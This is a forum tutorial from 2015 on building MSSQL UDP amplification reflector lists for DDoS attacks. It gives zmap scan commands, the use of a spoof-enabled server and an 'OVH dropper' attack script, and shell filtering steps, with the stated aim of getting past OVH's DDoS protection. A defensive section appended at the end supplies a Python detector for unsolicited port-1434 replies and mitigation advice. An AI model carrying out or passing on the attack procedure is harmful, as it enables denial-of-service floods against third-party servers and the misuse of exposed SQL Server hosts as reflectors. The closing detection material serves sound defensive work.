How to scan MSSQL amplified



Post by Admin on Fri Jan 02, 2015 9:51 pm

What you need:
100Mbps/1Gbps dedicated server or XEN/KVM VPS. (OpenVZ VPSs won't work)
OVH Dropper attack script: You can either buy it or find the public version. Ask a few people.
You will also need a spoofable server.
mssql_1434.pkt: [You must be registered and logged in to see this link.]
CentOS 6/7

Note* This method works very well and is super fast; it's not the easiest, though. MSSQL has a 10x amplification factor. It's overall a very bad amplification method but works well against protected servers such as OVH since the filter does not catch it and treats the traffic as legitimate traffic, therefore allowing it to flood the port.

How to create MSSQL amplification lists

- Update your server.

yum -y update

- Install dependencies.

yum -y install zmap php python perl make gcc build-essential cmake libgmp3-dev libpcap-dev gengetopt byacc flex

- Download the mssql_1434.pkt and place in root directory.

- Run the zmap command.

zmap -p 1434 -M udp --probe-args=file:/root/mssql_1434.pkt -o mssql_1434.txt

Note* The scan will take 2 hours on a 1Gbps server. Please wait until it's completely finished scanning.

- Upload the mssql_1434.txt list to a spoof-enabled server

- Connect to your spoof-enabled server and install the dependencies.

yum -y install iptraf

- Run iptraf.


- Enable logging in iptraf.

Configure > Logging (Push enter)

[Image: ywTJFIQ.png]

- Create a UDP filter in iptraf.


Filters > IP > Define new filter > Name: MSSQL > CTRL-A

[Image: sQxHbBh.png]

- Apply the filter.
- Exit the menu.
- Select "IP traffic monitor".

- Select Eth0/Eth1 or the lowest interface on the list.
[Image: 6b6WdWs.png]

- Select the location in which the log file will be stored.
[Image: 7FClobf.png]

- Open another putty session on your spoofable server.

- Use the MSSQL/OVH dropper attack script and attack your own server using the mssql_1434.txt you made earlier.
Note* Change the IP to whatever your spoofable server's IP is.


./mssql 1434 mssql_1434.txt 1 2600

- In iptraf you should see a bunch of IPs incoming.

- Once the attack is over close iptraf.


- Change to the directory where your iptraf logfile is stored.
Note* Change /root to whatever directory it's stored in.


cd /root

- Take out all the responses that replied with over 199 bytes and store them in 200bytes.txt.


awk '$8 > 199' dongs.txt > 200bytes.txt

- Remove everything but the bare IPs into 200bytesips.txt.


grep -Eo "[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}" 200bytes.txt > 200bytesips.txt

- Remove duplicates and randomly sort.


sort 200bytesips.txt | uniq -u > 200bytescleaned.txt; sort --random-sort 200bytescleaned.txt > done.txt

Done! Enjoy your list.

More information:
- If you need help, post below.
- 200Bytes seems to work best and last the longest, I suggest messing around though.
- Server freezing? Limit the zmap bandwidth with:



Add that behind the port. 10M = 100Mbps. Change as you like.

Please leave a thanks if you enjoyed this tutorial.

This is for educational purposes only.
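From the defender's side, the traffic this post describes shows up in flow logs as UDP packets with source port 1434 arriving at a host that never sent a query to the sender. The following is an added example, not part of the original post: a small detector run over constructed flow records. The record layout, the addresses and the `min_reflectors` threshold are assumptions made for illustration.

```python
import csv
import io
from collections import defaultdict

SQL_BROWSER_PORT = 1434  # UDP port named in the post (SQL Server Browser service)

# Constructed sample flow records (documentation address ranges), not real traffic.
# Assumed columns: timestamp, src_ip, src_port, dst_ip, dst_port, proto, bytes
SAMPLE_FLOWS = """\
1,192.0.2.10,51000,198.51.100.5,1434,udp,29
2,198.51.100.5,1434,192.0.2.10,51000,udp,310
3,203.0.113.7,1434,192.0.2.20,80,udp,290
4,203.0.113.8,1434,192.0.2.20,80,udp,305
5,203.0.113.9,1434,192.0.2.20,80,udp,298
6,203.0.113.7,1434,192.0.2.20,80,udp,290
7,198.51.100.77,53,192.0.2.20,40000,udp,120
"""


def find_reflection_victims(flow_csv, min_reflectors=3):
    """Return {victim_ip: {"reflectors": n, "bytes": total}} for hosts that receive
    UDP replies from source port 1434 they never asked for, from at least
    min_reflectors distinct senders. Records must be in time order."""
    queried = set()  # (client, server) pairs where the client really sent a query
    unsolicited = defaultdict(lambda: {"sources": set(), "bytes": 0})
    for row in csv.reader(io.StringIO(flow_csv)):
        if len(row) != 7 or row[5] != "udp":
            continue  # skip malformed rows and non-UDP flows
        _, src, sport, dst, dport, _, size = row
        if int(dport) == SQL_BROWSER_PORT:
            queried.add((src, dst))  # genuine lookup, its reply is expected
        elif int(sport) == SQL_BROWSER_PORT and (dst, src) not in queried:
            entry = unsolicited[dst]  # reply with no matching request
            entry["sources"].add(src)
            entry["bytes"] += int(size)
    return {
        victim: {"reflectors": len(e["sources"]), "bytes": e["bytes"]}
        for victim, e in unsolicited.items()
        if len(e["sources"]) >= min_reflectors
    }


if __name__ == "__main__":
    for victim, stats in find_reflection_victims(SAMPLE_FLOWS).items():
        print(f"{victim}: {stats['reflectors']} reflectors, {stats['bytes']} unsolicited bytes")
```

On the server side, a SQL Server host whose Browser service is disabled, or whose UDP port 1434 is not reachable from the internet, cannot be used as a reflector in the first place.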
